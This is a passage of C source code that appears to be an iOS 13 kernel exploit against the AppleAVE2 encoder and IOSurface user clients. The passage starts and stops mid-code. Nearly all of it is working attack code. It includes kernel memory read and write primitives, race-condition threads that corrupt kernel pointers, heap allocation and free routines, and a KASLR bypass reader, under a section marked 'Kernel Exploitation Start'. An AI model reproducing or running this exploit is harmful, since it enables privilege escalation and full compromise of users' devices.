IKOT_PAGING_REQUEST     9\n#define 
IKOT_MIG                10\n#define IKOT_MEMORY_OBJECT      11\n#define IKOT_XMM_PAGER          12\n#define IKOT_XMM_KERNEL         13\n#define IKOT_XMM_REPLY          14\n#define IKOT_UND_REPLY          15\n#define IKOT_HOST_NOTIFY        16\n#define IKOT_HOST_SECURITY      17\n#define IKOT_LEDGER             18\n#define IKOT_MASTER_DEVICE      19\n#define IKOT_TASK_NAME          20\n#define IKOT_SUBSYSTEM          21\n#define IKOT_IO_DONE_QUEUE      22\n#define IKOT_SEMAPHORE          23\n#define IKOT_LOCK_SET           24\n#define IKOT_CLOCK              25\n#define IKOT_CLOCK_CTRL         26\n#define IKOT_IOKIT_SPARE        27\n#define IKOT_NAMED_ENTRY        28\n#define IKOT_IOKIT_CONNECT      29\n#define IKOT_IOKIT_OBJECT       30\n#define IKOT_UPL                31\n#define IKOT_MEM_OBJ_CONTROL    32\n#define IKOT_AU_SESSIONPORT     33\n#define IKOT_FILEPORT           34\n#define IKOT_LABELH             35\n#define IKOT_TASK_RESUME        36\n\nvolatile struct ipc_port {\n    uint32_t ip_bits;\n    uint32_t ip_references;\n    struct {\n        uint64_t data;\n        uint64_t type;\n    } ip_lock; // spinlock\n    struct {\n        struct {\n            struct {\n                uint32_t flags;\n                uint32_t waitq_interlock;\n                uint64_t waitq_set_id;\n                uint64_t waitq_prepost_id;\n                struct {\n                    uint64_t next;\n                    uint64_t prev;\n                } waitq_queue;\n            } waitq;\n            uint64_t messages;\n            uint32_t seqno;\n            uint32_t receiver_name;\n            uint16_t msgcount;\n            uint16_t qlimit;\n            uint32_t pad;\n        } port;\n        uint64_t klist;\n    } ip_messages;\n    uint64_t ip_receiver;\n    uint64_t ip_kobject;\n    // above stru members are pretty stable across versions, below is not, plz pay attenion to change\n    uint64_t ip_nsrequest;\n    uint64_t ip_pdrequest;\n    uint64_t ip_requests;\n    
uint64_t ip_premsg;\n    uint64_t ip_context;\n    uint32_t ip_flags;\n    uint32_t ip_mscount;\n    uint32_t ip_srights;\n    uint32_t ip_sorights;\n};\n\nvolatile struct task\n{\n    struct {\n        uint64_t data;\n        uint32_t reserved : 24,\n        type     :  8;\n        uint32_t pad;\n    } lock; // mutex lock\n    uint32_t ref_count;\n    uint32_t active;\n    uint32_t halting;\n    uint32_t pad;\n    uint32_t pad2;\n    uint32_t pad3;\n    uint64_t map;\n};\n\nenum\n{\n    kOSSerializeDictionary      = 0x01000000U,\n    kOSSerializeArray           = 0x02000000U,\n    kOSSerializeSet             = 0x03000000U,\n    kOSSerializeNumber          = 0x04000000U,\n    kOSSerializeSymbol          = 0x08000000U,\n    kOSSerializeString          = 0x09000000U,\n    kOSSerializeData            = 0x0a000000U,\n    kOSSerializeBoolean         = 0x0b000000U,\n    kOSSerializeObject          = 0x0c000000U,\n    \n    kOSSerializeTypeMask        = 0x7F000000U,\n    kOSSerializeDataMask        = 0x00FFFFFFU,\n    \n    kOSSerializeEndCollection   = 0x80000000U,\n    \n    kOSSerializeMagic           = 0x000000d3U,\n};\n\nextern void print_hexdump(void *buf, size_t len);\nextern void Reply_notify_completion(void);\nextern void Send_overwritting_iosurfaceMap(uint64_t remote_map_addr, uint64_t *local_map_addr);\nextern void Send_notify_msg(void);\nextern bool check_if_its_PAC_device(void);\n\npthread_attr_t pth_commAttr = {0};\nvoid pth_commAttr_init(){\n    pthread_attr_init(&pth_commAttr);\n    pthread_attr_setdetachstate(&pth_commAttr, PTHREAD_CREATE_DETACHED);\n}\n\nbool check_num_stringlizability_4bytes(uint32_t input_num){\n    char *stringlize = (char*)&input_num;\n    if(stringlize[0] == '\\0')\n        return false;\n    if(stringlize[1] == '\\0')\n        return false;\n    return true;\n}\n\nvoid IOSurfaceRootUserClient_remove_surface_map(io_connect_t ioconn, uint32_t surfaceId){\n    // Release the surface\n    uint64_t input_sca = surfaceId;\n    
IOConnectCallScalarMethod(ioconn, 1, &input_sca, 1, NULL, NULL);\n}\n\nuint32_t IOSurfaceRootUserClient_create_surface_map(io_connect_t ioconn, uint64_t *remote_map_addr, uint32_t *remote_map_size){\n    \n    uint32_t dict_create[] =\n    {\n        kOSSerializeMagic,\n        kOSSerializeEndCollection | kOSSerializeDictionary | 1,\n        \n        kOSSerializeSymbol | 19,\n        0x75534f49, 0x63616672, 0x6c6c4165, 0x6953636f, 0x657a, // \"IOSurfaceAllocSize\"\n        kOSSerializeEndCollection | kOSSerializeNumber | 32,\n        0x4000000, //Need be equal or greater than 0x25BA8 ref: AVE ERROR: IOSurfaceBufferInitInfo->Size() bad\n        0x0,\n    };\n    \n    size_t output_stru_size = 0xDD0; // A fixed size\n    char *output_stru = calloc(1, output_stru_size);\n    int kr = IOConnectCallStructMethod(ioconn, 0, dict_create, sizeof(dict_create), output_stru, &output_stru_size);\n    if(!kr){\n        uint64_t ret_addr1 = *(uint64_t*)output_stru;\n        //uint64_t ret_addr2 = *(uint64_t*)(output_stru + 8); // Read-only mapping from kernel\n        //uint64_t ret_addr3 = *(uint64_t*)(output_stru + 0x10); // Read-only mapping from kernel\n        // These are unused values here, you can deleted them.\n        \n        uint32_t ret_addr1_size = *(uint32_t*)(output_stru + 0x1C); // Must be uint32_t length here\n        \n        *remote_map_addr = ret_addr1;\n        *remote_map_size = ret_addr1_size;\n        \n        return *(uint32_t*)(output_stru+0x18); //Output: Surface ID\n    }\n    return 0;\n}\n\n#pragma mark --- TFP0 Kernel Memory R/W Components ---\n\nuint64_t kaslr = 0;\nuint64_t kernel_map_kAddr = 0;\nuint64_t ipc_space_kernel_kAddr = 0;\nuint32_t tfp0_port = 0;\nuint64_t tfp0_portStru = 0;\njmp_buf reattempt_jmpb;\n\nuint32_t new_reading_primitive(uint64_t target_addr);\nuint8_t KernelRead_1byte(uint64_t rAddr){\n    if(tfp0_port){\n        uint8_t retdata = 0;\n        vm_size_t outsize = 0x1;\n        vm_read_overwrite(tfp0_port, rAddr, 0x1, 
(vm_address_t)&retdata, &outsize);\n        return retdata;\n    }\n    return (uint8_t)new_reading_primitive(rAddr);\n}\n\nuint16_t KernelRead_2bytes(uint64_t rAddr){\n    if(tfp0_port){\n        uint16_t retdata = 0;\n        vm_size_t outsize = 0x2;\n        vm_read_overwrite(tfp0_port, rAddr, 0x2, (vm_address_t)&retdata, &outsize);\n        return retdata;\n    }\n    return (uint16_t)new_reading_primitive(rAddr);\n}\n\nuint32_t KernelRead_4bytes(uint64_t rAddr){\n    if(tfp0_port){\n        uint32_t retdata = 0;\n        vm_size_t outsize = 0x4;\n        vm_read_overwrite(tfp0_port, rAddr, 0x4, (vm_address_t)&retdata, &outsize);\n        return retdata;\n    }\n    return new_reading_primitive(rAddr);\n}\n\nuint64_t KernelRead_8bytes(uint64_t rAddr){\n    if(tfp0_port){\n        uint64_t retdata = 0;\n        vm_size_t outsize = 0x8;\n        vm_read_overwrite(tfp0_port, rAddr, 0x8, (vm_address_t)&retdata, &outsize);\n        return retdata;\n    }\n    uint32_t low_32bit = new_reading_primitive(rAddr);\n    uint32_t high_32bit = new_reading_primitive(rAddr + 4);\n    return (uint64_t)((((uint64_t)high_32bit) << 32) | low_32bit);\n}\n\nvoid KernelRead_anySize(uint64_t rAddr, char *outbuf, size_t outbuf_len){\n    if(tfp0_port){\n        vm_size_t outsize = outbuf_len;\n        vm_read_overwrite(tfp0_port, rAddr, outbuf_len, (vm_address_t)outbuf, &outsize);\n        return;\n    }\n    uint32_t aligned_outbuf_len = (uint32_t)outbuf_len;\n    aligned_outbuf_len = (aligned_outbuf_len%4)?(((aligned_outbuf_len/4)+1)*4):aligned_outbuf_len;\n    \n    for(int i=0; i<aligned_outbuf_len; i=i+4){\n        *(uint32_t*)(outbuf + i) = new_reading_primitive(rAddr + i);\n    }\n}\n\nvoid new_writing_primi(uint64_t target_addr, uint32_t write_data);\nvoid KernelWrite_1byte(uint64_t wAddr, uint8_t wData){\n    if(tfp0_port){\n        vm_write(tfp0_port, wAddr, (vm_offset_t)&wData, 0x1);\n        return;\n    }\n    uint32_t read_data = KernelRead_4bytes(wAddr);\n    
*(uint8_t*)(&read_data) = wData;\n    new_writing_primi(wAddr, read_data);\n}\n\nvoid KernelWrite_2bytes(uint64_t wAddr, uint16_t wData){\n    if(tfp0_port){\n        vm_write(tfp0_port, wAddr, (vm_offset_t)&wData, 0x2);\n        return;\n    }\n    uint32_t read_data = KernelRead_4bytes(wAddr);\n    *(uint16_t*)(&read_data) = wData;\n    new_writing_primi(wAddr, read_data);\n}\n\nvoid KernelWrite_4bytes(uint64_t wAddr, uint32_t wData){\n    if(tfp0_port){\n        vm_write(tfp0_port, wAddr, (vm_offset_t)&wData, 0x4);\n        return;\n    }\n    new_writing_primi(wAddr, wData);\n}\n\nvoid KernelWrite_8bytes(uint64_t wAddr, uint64_t wData){\n    if(tfp0_port){\n        vm_write(tfp0_port, wAddr, (vm_offset_t)&wData, 0x8);\n        return;\n    }\n    KernelWrite_4bytes(wAddr, (uint32_t)wData);\n    KernelWrite_4bytes(wAddr + 4, (uint32_t)(wData >> 32));\n}\n\nvoid KernelWrite_anySize(uint64_t wAddr, char *inputbuf, uint32_t inputbuf_len){\n    if(tfp0_port){\n        vm_write(tfp0_port, wAddr, (vm_offset_t)inputbuf, inputbuf_len);\n        return;\n    }\n    for(int i=0; i<inputbuf_len; i=i+4){\n        new_writing_primi(wAddr + i, *(uint32_t*)(inputbuf + i));\n    }\n}\n\nuint64_t KernelAllocate(size_t len){\n    vm_address_t return_addr = 0;\n    vm_allocate(tfp0_port, (vm_address_t*)&return_addr, len, VM_FLAGS_ANYWHERE);\n    return return_addr;\n}\n\nvoid KernelDeallocate(uint64_t addr, size_t len){\n    vm_deallocate(tfp0_port, addr, len);\n}\n\nuint32_t KernelUti_GenerateOffset(uint64_t src, uint64_t data_in_src){\n    uint32_t returnVal = 0;\n    while(1){\n        uint64_t gg = KernelRead_8bytes(src);\n        if(gg == data_in_src)\n            return returnVal;\n        returnVal += 4;\n        src += 4;\n    }\n    return 0;\n}\n\n#pragma mark --- Kernel Exploitation Start ---\n\nio_connect_t AppleAVE2UserClient_ioconn;\nio_connect_t IOSurfaceRootUserClient_ioconn;\n\nchar *inputmap_InitInfo = NULL;\nuint32_t InitInfo_surfaceId = 0;\n\nuint32_t 
extra1_surfaceId = 0;\nuint32_t extra2_surfaceId = 0;\nuint32_t extraMany_surfaceID[20] = {0};\n\nuint64_t input_shit = 0;\nuint64_t kObject_AppleAVE2Driver = 0;\nuint64_t kObject_IOSurface = 0;\n\nuint64_t our_task_kAddr = 0;\nuint64_t our_proc_kAddr = 0;\n\nvoid kernel_exp_start(io_connect_t ave_ioconn, io_connect_t surface_ioconn){\n    pth_commAttr_init();\n    Apply_hardcoded_addresses_and_offsets();\n    \n    AppleAVE2UserClient_ioconn = ave_ioconn;\n    IOSurfaceRootUserClient_ioconn = surface_ioconn;\n    \n    extern void ios13_kernel_pwn(io_connect_t ioconn, io_connect_t surface_ioconn);\n    ios13_kernel_pwn(ave_ioconn, surface_ioconn);\n}\n\nvoid race_kmem2(){\n    uint64_t *alert1 = (uint64_t*)(inputmap_InitInfo + 1072);\n    uint32_t *action1 = (uint32_t*)(inputmap_InitInfo + 4);\n    while(*alert1 == 0){}\n    *action1 = 0;\n}\n\nuint64_t alloc_kernel_40_mem(){\n    \n    uint64_t user_iosurfaceinfo_buf;\n    \n    *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 2020) = 160;\n    *(uint32_t*)(inputmap_InitInfo + 2024) = 64;\n    \n    *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n    *(uint32_t*)(inputmap_InitInfo + 12) = 5;\n    \n    *(uint32_t*)(inputmap_InitInfo + 96) = 1; // Skip code at: if ( *(_DWORD *)&clientbuf->inputmap_InitInfo_block1[96] != 1 )\n    *(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n    \n    {\n        char *input_stru = calloc(1, 0x28);\n        *(uint32_t*)(input_stru + 8) = 0; // offset of inputmap_FrameInfo, godamn, cool feature\n        *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n        \n        size_t output_stru_size = 0x4;\n        char *output_stru = calloc(1, output_stru_size);\n        IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, output_stru, &output_stru_size);\n    }\n    \n    user_iosurfaceinfo_buf = 
*(uint64_t*)(inputmap_InitInfo + 5936);\n    \n    return user_iosurfaceinfo_buf;\n}\n\nvoid empty_kernel_40_mem(uint64_t target_addr){\n    \n    *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 2020) = 160;\n    *(uint32_t*)(inputmap_InitInfo + 2024) = 64;\n    \n    *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n    *(uint32_t*)(inputmap_InitInfo + 12) = 5;\n   \n    *(uint32_t*)(inputmap_InitInfo + 96) = 1;\n    *(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n    *(uint64_t*)(inputmap_InitInfo + 5936) = target_addr;\n    \n    {\n        char *input_stru = calloc(1, 0x28);\n        *(uint32_t*)(input_stru + 8) = 0;\n        *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n        \n        size_t output_stru_size = 0x4;\n        char *output_stru = calloc(1, output_stru_size);\n        IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, output_stru, &output_stru_size);\n    }\n}\n\nuint64_t alloc_kernel_40_mem_contains_iosurfacebuf(){\n    \n    uint64_t user_iosurfaceinfo_buf;\n    \n    *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n    \n    *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n    *(uint32_t*)(inputmap_InitInfo + 12) = 0;\n   \n    *(uint32_t*)(inputmap_InitInfo + 96) = 1;\n    *(uint8_t*)(inputmap_InitInfo + 13477) = 0;\n    \n    *(uint32_t*)(inputmap_InitInfo + 4) = 0x333;\n    \n    {\n        char *input_stru = calloc(1, 0x28);\n        *(uint32_t*)(input_stru + 8) = 0;\n        *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n        \n        size_t output_stru_size = 0x4;\n        char *output_stru = calloc(1, output_stru_size);\n        IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, output_stru, &output_stru_size);\n    }\n    \n    *(uint32_t*)(inputmap_InitInfo + 4) = 0x1; // this effect 40_mem_destroy, so must set back\n 
   \n    user_iosurfaceinfo_buf = *(uint64_t*)(inputmap_InitInfo + 5936);\n    \n    return user_iosurfaceinfo_buf;\n}\n\nvoid release_kernel_40_mem(uint64_t user_iosurfaceinfo_buf){\n    \n    *(uint32_t*)(inputmap_InitInfo + 4) = 0;\n    *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n   \n    *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n    *(uint32_t*)(inputmap_InitInfo + 12) = 0;\n    \n    *(uint32_t*)(inputmap_InitInfo + 96) = 1;\n    *(uint8_t*)(inputmap_InitInfo + 13477) = 0;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = user_iosurfaceinfo_buf;\n    \n    char *input_stru = calloc(1, 0x28);\n    *(uint32_t*)(input_stru + 8) = 0;\n    *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n    \n    size_t output_stru_size = 0x4;\n    char *output_stru = calloc(1, output_stru_size);\n    \n    IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, output_stru, &output_stru_size);\n    \n    if(*(uint64_t*)(inputmap_InitInfo + 5936)){\n        (printf)(\"release_kernel_40_mem failure detected....reattemping\\n\");\n        longjmp(reattempt_jmpb, 1);\n    }\n}\n\nvoid IOSurfaceRootUserClient_sRemoveValue(uint32_t spray_id, uint32_t key){\n    \n    uint32_t input_stru[3] = {0};\n    input_stru[0] = spray_id;\n    input_stru[1] = 0;\n    input_stru[2] = key;\n    \n    size_t output_stru_size = 4;\n    uint32_t output_stru = 0;\n    \n    IOConnectCallStructMethod(IOSurfaceRootUserClient_ioconn, 11, input_stru, sizeof(input_stru), &output_stru, &output_stru_size);\n}\n\nchar *www_output_stru = NULL;\nchar *IOSurfaceRootUserClient_sCopyValue(uint32_t spray_id, uint32_t lookup_key){\n    \n    uint32_t input_stru[3] = {0};\n    input_stru[0] = spray_id;\n    input_stru[1] = 0;\n    input_stru[2] = lookup_key;\n    \n    size_t output_stru_size = 5000;\n    if(!www_output_stru)\n        www_output_stru = malloc(output_stru_size);\n    bzero(www_output_stru, output_stru_size);\n    \n    int kr 
= IOConnectCallStructMethod(IOSurfaceRootUserClient_ioconn, 10, input_stru, sizeof(input_stru), www_output_stru, &output_stru_size);\n    if(kr){\n        printf(\"lookup_key: 0x%x IOSurfaceRootUserClient_sCopyValue failure: 0x%x\\n\", lookup_key, kr);\n        return NULL;\n    }\n    \n    return www_output_stru;\n}\n\nuint64_t magic_addr = 0;\n\nuint64_t _temp_kernel_reading_mapOffset = 0x30000;\nuint8_t _temp_kernel_reading_semaphore = 0;\nuint64_t _temp_kernel_reading_target_addr = 0;\n\nvoid _temp_kernel_reading_threadFunc(){\n    \n    uint64_t precalc_value1 = magic_addr + _temp_kernel_reading_mapOffset; // input_shit\n    uint64_t precalc_value2 = _temp_kernel_reading_target_addr - 64;\n    uint64_t backup_iosurfacebuf = 0;\n    \n    uint64_t *alert1 = (uint64_t*)(inputmap_InitInfo + 1096);\n    uint64_t *alert2 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset); // input_shit->ptr\n    uint64_t *alert3 = (uint64_t*)(inputmap_InitInfo + 56);\n    \n    _temp_kernel_reading_semaphore = 1; // Ready\n    \n    while(!*alert1){if(!_temp_kernel_reading_semaphore) return;}\n    *(uint64_t*)(inputmap_InitInfo + 5936) = precalc_value1;\n    \n    while(!*alert2){if(!_temp_kernel_reading_semaphore) return;}\n    backup_iosurfacebuf = *alert2;\n    *alert2 = precalc_value2;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n    \n    while(!*alert3){if(!_temp_kernel_reading_semaphore) return;}\n    *alert2 = 0;//backup_iosurfacebuf;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n}\n\nuint64_t temp_kernel_reading(uint64_t target_addr){\n    \n    int kr = 0;\n    uint64_t retdata = 0;\n    do{\n        *(uint64_t*)(inputmap_InitInfo + 56) = 0;\n        *(uint64_t*)(inputmap_InitInfo + 1096) = 0;\n        *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n        \n        *(uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset) = 0; // input_shit\n        \n        _temp_kernel_reading_target_addr = target_addr;\n        
_temp_kernel_reading_semaphore = 0;\n        pthread_t ph = NULL;\n        pthread_create(&ph, NULL, (void*)_temp_kernel_reading_threadFunc, NULL);\n        while(!_temp_kernel_reading_semaphore){};\n        \n        *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569; // InfoType\n        *(uint32_t*)(inputmap_InitInfo + 12) = 0; // To cause AVE ERROR: multiPassEndPassCounterWFR *Can use for early return\n        // or cause unmap later in IMG_V_EncodeAndSendFrame\n        \n        *(uint32_t*)(inputmap_InitInfo + 96) = 1; // Skip code at: if ( *(_DWORD *)&clientbuf->inputmap_InitInfo_block1[96] != 1 )\n        *(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n        *(uint64_t*)(inputmap_InitInfo + 5936) = magic_addr + 0x30000 - 0x28; // point to a unused addr\n        {\n            char input_stru[0x28] = {0};\n            *(uint32_t*)(input_stru + 8) = 0;\n            *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n            \n            size_t output_stru_size = 0x4;\n            uint32_t output_stru = 0;\n            IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n        }\n        _temp_kernel_reading_semaphore = 0;\n        pthread_join(ph, NULL);\n        \n        \n        uint64_t *alert3 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset + 0x10);\n        if(*alert3){\n            (printf)(\"alert3: 0x%llx\\n\", *alert3);\n            retdata = *alert3;\n            //break;\n        }\n        \n        _temp_kernel_reading_mapOffset = _temp_kernel_reading_mapOffset + 0x8;\n        *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n        //retdata = *(uint64_t*)(inputmap_InitInfo + 56);\n        \n    }while(!retdata || kr);\n    \n    \n    return retdata;\n}\n\nvoid _temp_kernel_reading_categ3_threadFunc(){\n    \n    uint64_t precalc_value1 = magic_addr + _temp_kernel_reading_mapOffset; // input_shit\n    uint64_t precalc_value2 = 
_temp_kernel_reading_target_addr - 64;\n    uint64_t backup_iosurfacebuf = 0;\n    \n    uint64_t *alert1 = (uint64_t*)(inputmap_InitInfo + 1096);\n    uint64_t *alert2 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset); // input_shit->ptr\n    uint64_t *alert3 = (uint64_t*)(inputmap_InitInfo + 56);\n    \n    _temp_kernel_reading_semaphore = 1; // Ready\n    \n    while(!*alert1){if(!_temp_kernel_reading_semaphore) return;}\n    *(uint64_t*)(inputmap_InitInfo + 5936) = precalc_value1;\n    \n    while(!*alert2){if(!_temp_kernel_reading_semaphore) return;}\n    backup_iosurfacebuf = *alert2;\n    *alert2 = precalc_value2;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n    \n    while(!*alert3){if(!_temp_kernel_reading_semaphore) return;}\n    *alert2 = 0;//backup_iosurfacebuf;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n}\n\nuint32_t temp_kernel_reading_categ3(uint64_t target_addr){\n    \n    int kr = 0;\n    uint32_t retdata = 0;\n    do{\n        //*(uint32_t*)(inputmap_InitInfo + 4) = 99;\n        *(uint64_t*)(inputmap_InitInfo + 56) = 0;\n        *(uint64_t*)(inputmap_InitInfo + 1096) = 0;\n        *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n        \n        *(uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset) = 0; // input_shit\n        \n        _temp_kernel_reading_target_addr = target_addr;\n        _temp_kernel_reading_semaphore = 0;\n        pthread_t ph = NULL;\n        pthread_create(&ph, NULL, (void*)_temp_kernel_reading_categ3_threadFunc, NULL);\n        while(!_temp_kernel_reading_semaphore){};\n        \n        *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569; // InfoType\n        *(uint32_t*)(inputmap_InitInfo + 12) = 0; // To cause AVE ERROR: multiPassEndPassCounterWFR *Can use for early return\n        // or cause unmap later in IMG_V_EncodeAndSendFrame\n        \n        *(uint32_t*)(inputmap_InitInfo + 96) = 1; // Skip code at: if ( *(_DWORD *)&clientbuf->inputmap_InitInfo_block1[96] != 1 )\n        
*(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n        *(uint64_t*)(inputmap_InitInfo + 5936) = magic_addr + 0x30000 - 0x28; // point to a unused addr\n        {\n            char input_stru[0x28] = {0};\n            *(uint32_t*)(input_stru + 8) = 0;\n            *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n            \n            size_t output_stru_size = 0x4;\n            uint32_t output_stru = 0;\n            IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n        }\n        _temp_kernel_reading_semaphore = 0;\n        pthread_join(ph, NULL);\n        \n        \n        uint32_t *alert3 = (uint32_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset + 16);\n        if(*alert3){\n            //(printf)(\"temp_kernel_reading_bypass_kaslr: 0x%x\\n\", *alert3);\n            retdata = *alert3;\n            //break;\n        }\n        \n        _temp_kernel_reading_mapOffset = _temp_kernel_reading_mapOffset + 16;\n        *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n        //retdata = *(uint64_t*)(inputmap_InitInfo + 56);\n        \n    }while(!retdata || kr);\n    \n    //complete_frame(0); // mmm\n    return retdata;\n}\n\nvoid _temp_kernel_reading_bypass_kaslr_threadFunc(){\n    \n    uint64_t precalc_value1 = magic_addr + _temp_kernel_reading_mapOffset; // input_shit\n    uint64_t precalc_value2 = _temp_kernel_reading_target_addr - 24;\n    uint64_t backup_iosurfacebuf = 0;\n    \n    uint64_t *alert1 = (uint64_t*)(inputmap_InitInfo + 1096);\n    uint64_t *alert2 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset); // input_shit->ptr\n    uint64_t *alert3 = (uint64_t*)(inputmap_InitInfo + 56);\n    \n    _temp_kernel_reading_semaphore = 1; // Ready\n    \n    while(!*alert1){if(!_temp_kernel_reading_semaphore) return;}\n    *(uint64_t*)(inputmap_InitInfo + 5936) = precalc_value1;\n    \n    while(!*alert2){if(!_temp_kernel_reading_semaphore) return;}\n   
 backup_iosurfacebuf = *alert2;\n    *alert2 = precalc_value2;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n    \n    while(!*alert3){if(!_temp_kernel_reading_semaphore) return;}\n    *alert2 = 0;//backup_iosurfacebuf;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n}\n\nuint32_t temp_kernel_reading_categ5(uint64_t target_addr){\n    \n    int kr = 0;\n    uint32_t retdata = 0;\n    do{\n        //*(uint32_t*)(inputmap_InitInfo + 4) = 99;\n        *(uint64_t*)(inputmap_InitInfo + 56) = 0;\n        *(uint64_t*)(inputmap_InitInfo + 1096) = 0;\n        *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n        \n        *(uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset) = 0; // input_shit\n        \n        _temp_kernel_reading_target_addr = target_addr;\n        _temp_kernel_reading_semaphore = 0;\n        pthread_t ph = NULL;\n        pthread_create(&ph, NULL, (void*)_temp_kernel_reading_bypass_kaslr_threadFunc, NULL);\n        while(!_temp_kernel_reading_semaphore){};\n        \n        *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569; // InfoType\n        *(uint32_t*)(inputmap_InitInfo + 12) = 0; // To cause AVE ERROR: multiPassEndPassCounterWFR *Can use for early return\n        // or cause unmap later in IMG_V_EncodeAndSendFrame\n        \n        *(uint32_t*)(inputmap_InitInfo + 96) = 1; // Skip code at: if ( *(_DWORD *)&clientbuf->inputmap_InitInfo_block1[96] != 1 )\n        *(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n        *(uint64_t*)(inputmap_InitInfo + 5936) = magic_addr + 0x30000 - 0x28; // point to a unused addr\n        {\n            char input_stru[0x28] = {0};\n            *(uint32_t*)(input_stru + 8) = 0;\n            *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n            \n            size_t output_stru_size = 0x4;\n            uint32_t output_stru = 0;\n            IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n        }\n        
_temp_kernel_reading_semaphore = 0;\n        pthread_join(ph, NULL);\n        \n        \n        uint32_t *alert3 = (uint32_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset + 32);\n        if(*alert3){\n            //(printf)(\"temp_kernel_reading_bypass_kaslr: 0x%x\\n\", *alert3);\n            retdata = *alert3;\n        }\n        \n        _temp_kernel_reading_mapOffset = _temp_kernel_reading_mapOffset + 0x8;\n        *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n        \n    }while(!retdata || kr);\n    \n    return retdata;\n}\n\nvoid temp_kernel_reading_insert_valid_kaddr(uint64_t target_addr){\n    \n    *(uint64_t*)(inputmap_InitInfo + 56) = 0;\n    *(uint64_t*)(inputmap_InitInfo + 1096) = 0;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n    \n    *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569; // InfoType\n    *(uint32_t*)(inputmap_InitInfo + 12) = 0;\n    *(uint32_t*)(inputmap_InitInfo + 96) = 1;\n    *(uint8_t*)(inputmap_InitInfo + 13477) = 0;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = target_addr;\n    {\n        char input_stru[0x28] = {0};\n        *(uint32_t*)(input_stru + 8) = 0;\n        *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n        \n        size_t output_stru_size = 0x4;\n        uint32_t output_stru = 0;\n        IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n    }\n    \n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n}\n\nvoid _temp_kernel_reading_release_mem_threadFunc(){\n    \n    uint64_t precalc_value1 = magic_addr + _temp_kernel_reading_mapOffset; // input_shit\n    uint64_t precalc_value2 = _temp_kernel_reading_target_addr;\n    \n    uint64_t *alert1 = (uint64_t*)(inputmap_InitInfo + 1096);\n    uint64_t *alert2 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset); // input_shit->ptr\n    uint64_t *alert3 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset + 8);\n    \n    _temp_kernel_reading_semaphore = 1; // 
